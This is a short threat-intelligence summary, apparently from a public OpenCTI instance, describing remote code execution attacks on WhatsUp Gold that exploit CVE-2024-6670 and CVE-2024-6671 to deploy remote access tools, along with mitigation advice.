Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

NetmanageIT OpenCTI - opencti.netmanageit.com

Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities



SUMMARY :

Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30. These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply patches quickly, leading to incidents immediately following the PoC's publication. Attackers abused NmPoller.exe to execute PowerShell scripts, downloading various remote access tools and attempting to gain persistence. Mitigation steps include keeping services under access control, immediate patch application, and monitoring suspicious process creation events in WhatsUp Gold environments.

OPENCTI LABELS :

atera agent,cve-2024-6670,remote access tools,splashtop remote,whatsup gold,radmin,cve-2024-6671


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities